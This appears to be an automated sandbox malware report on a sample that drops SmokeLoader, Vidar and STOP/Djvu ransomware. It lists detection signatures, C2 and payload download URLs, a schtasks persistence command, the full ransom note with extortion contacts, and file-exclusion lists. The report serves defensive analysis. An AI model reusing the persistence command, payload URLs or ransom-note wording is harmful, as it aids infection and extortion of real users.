Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\rujtcgu, CommandLine: C:\Users\user\AppData\Roaming\rujtcgu, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\rujtcgu, NewProcessName: C:\Users\user\AppData\Roaming\rujtcgu, OriginalFileName: C:\Users\user\AppData\Roaming\rujtcgu, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\rujtcgu, ProcessId: 2132, ProcessName: rujtcgu

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe" , ParentImage: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe, ParentProcessId: 1820, ParentProcessName: build3.exe, ProcessCommandLine: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe", ProcessId: 3384, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Snort Signatures

ET TROJAN Win32/Filecoder.STOP Variant Public Key Download - Source IP: 213.172.74.157 - Destination IP: 192.168.2.4

Timestamp:	05/25/24-21:29:44.396945
SID:	2036335
Source Port:	80
Destination Port:	49757
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Filecoder.STOP Variant Public Key Download - Source IP: 213.172.74.157 - Destination IP: 192.168.2.4

Timestamp:	05/25/24-21:29:44.401863
SID:	2036335
Source Port:	80
Destination Port:	49758
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:30:00.599943
SID:	2039103
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:30:01.497363
SID:	2039103
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:57.239689
SID:	2039103
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:40.316894
SID:	2039103
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:45.087893
SID:	2039103
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Vodkagats Loader Requesting Payload - Source IP: 192.168.2.4 - Destination IP: 213.172.74.157

Timestamp:	05/25/24-21:29:44.285365
SID:	2036333
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:38.780399
SID:	2039103
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Potential Dridex.Maldoc Minimal Executable Request - Source IP: 192.168.2.4 - Destination IP: 213.172.74.157

Timestamp:	05/25/24-21:29:44.285365
SID:	2020826
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:46.731629
SID:	2039103
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:51.704930
SID:	2039103
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:45.888233
SID:	2039103
Source Port:	49763
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:50.854256
SID:	2039103
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:23.967892
SID:	2039103
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:37.997029
SID:	2039103
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:26.439461
SID:	2039103
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:28.810994
SID:	2039103
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:47.693105
SID:	2039103
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:55.404520
SID:	2039103
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:25.627974
SID:	2039103
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:30:14.919115
SID:	2039103
Source Port:	49797
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:30:22.918329
SID:	2039103
Source Port:	49802
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:54.574933
SID:	2039103
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:30:25.031123
SID:	2039103
Source Port:	49805
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Win32/Vodkagats Loader Requesting Payload - Source IP: 192.168.2.4 - Destination IP: 189.163.126.89

Timestamp:	05/25/24-21:29:41.205625
SID:	2036333
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Potential Dridex.Maldoc Minimal Executable Request - Source IP: 192.168.2.4 - Destination IP: 189.163.126.89

Timestamp:	05/25/24-21:29:41.205625
SID:	2020826
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:59.082949
SID:	2039103
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:36.317305
SID:	2039103
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:28.037194
SID:	2039103
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:44.284933
SID:	2039103
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO TROJAN STOP Ransomware CnC Activity - Source IP: 192.168.2.4 - Destination IP: 213.172.74.157

Timestamp:	05/25/24-21:29:43.458282
SID:	2833438
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:56.417456
SID:	2039103
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:23.042406
SID:	2039103
Source Port:	49736
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:27.244515
SID:	2039103
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:37.086113
SID:	2039103
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:58.049560
SID:	2039103
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:49.866228
SID:	2039103
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.4 - Destination IP: 91.92.253.69

Timestamp:	05/25/24-21:30:03.404543
SID:	2019714
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:39.561780
SID:	2039103
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:30:02.640033
SID:	2039103
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:41.129515
SID:	2039103
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:30:30.914264
SID:	2039103
Source Port:	49810
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET TROJAN Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 158.160.165.129

Timestamp:	05/25/24-21:29:24.807766
SID:	2039103
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://api.2ip.ua/geo.json.	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/files/1/build3.exe?	Avira URL Cloud: Label: malware
Source: https://api.2ip.ua/geo.jsonJ	Avira URL Cloud: Label: malware
Source: http://cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.rddpg
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.rddpg
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	Avira: detection malicious, Label: TR/AD.MalwareCrypter.llbpm
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Avira: detection malicious, Label: HEUR/AGEN.1311176

Found malware configuration

Source: 00000012.00000002.2109889853.0000000002D90000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199689717899"], "Botnet": "4b617f18efba315ca20e874e36c04827", "Version": "9.8"}
Source: 00000004.00000002.1982678563.0000000002EF0000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: SmokeLoader {"Version": 2022, "C2 list": ["http://trad-einmyus.com/index.php", "http://tradein-myus.com/index.php", "http://trade-inmyus.com/index.php"]}
Source: 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Djvu {"Download URLs": ["http://sdfjhuz.com/dl/build2.exe", "http://cajgtus.com/files/1/build3.exe"], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/33b490a613f49fa190924f199d2c079e20240512191214/caaf73\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0871PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E

Multi AV Scanner detection for domain / URL

Source: sdfjhuz.com	Virustotal: Detection: 22%	Perma Link
Source: cajgtus.com	Virustotal: Detection: 23%	Perma Link
Source: transfer.adttemp.com.br	Virustotal: Detection: 8%	Perma Link
Source: nessotechbd.com	Virustotal: Detection: 18%	Perma Link
Source: trad-einmyus.com	Virustotal: Detection: 16%	Perma Link
Source: api.2ip.ua	Virustotal: Detection: 6%	Perma Link
Source: https://65.109.242.59/d	Virustotal: Detection: 6%	Perma Link
Source: https://65.109.242.59/r	Virustotal: Detection: 6%	Perma Link
Source: https://65.109.242.59/tography	Virustotal: Detection: 6%	Perma Link
Source: https://65.109.242.59/.	Virustotal: Detection: 7%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe	ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	ReversingLabs: Detection: 86%
Source: C:\Users\user\AppData\Roaming\rujtcgu	ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 31%
Source: file.exe	Virustotal: Detection: 43%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00411178 CryptDestroyHash,CryptReleaseContext,	10_2_00411178
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	10_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	10_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	10_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	10_2_0040EC68
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 10_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	10_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	15_2_0040E870
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,	15_2_0040EAA0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,	15_2_00410FC0
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_00411178 CryptDestroyHash,CryptReleaseContext,	15_2_00411178
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040EA51 CryptDestroyHash,CryptReleaseContext,	15_2_0040EA51
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Code function: 15_2_0040EC68 CryptDestroyHash,CryptReleaseContext,	15_2_0040EC68

Source: E609.exe, 0000000F.00000002.2883282984.000000000310E000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_b49521e8-f

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\AppData\Local\Temp\E609.exe	Unpacked PE file: 10.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\E609.exe	Unpacked PE file: 15.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Unpacked PE file: 17.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe	Unpacked PE file: 19.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Unpacked PE file: 27.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe	Unpacked PE file: 28.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	Unpacked PE file: 33.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe	Unpacked PE file: 35.2.mstsca.exe.400000.0.unpack

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: C:\Users\user\AppData\Local\Temp\E609.exe	File created: C:\_readme.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File created: C:\$WinREAgent\_readme.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe	File created: C:\$WinREAgent\Scratch\_readme.txt	Jump to behavior
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	File created: C:\_readme.txt
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe	File created: C:\Users\user\_readme.txt

Source: C:\Users\user\Desktop\file.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49751 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49755 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 103.174.152.66:443 -> 192.168.2.4:49756 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.102.42.29:443 -> 192.168.2.4:49762 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 65.109.242.59:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 192.185.16.114:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.4:49803 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.134.233:443 -> 192.168.2.4:49812 version: TLS 1.2

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: E609.exe, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: nss3.pdb@ source: build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp
Source:	Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000001A.00000000.2156846013.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001A.00000002.2242852483.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001C.00000000.2241978296.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, mstsca.exe, 00000020.00000002.2340193877.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000020.00000000.2255717001.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000023.00000000.2339511009.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
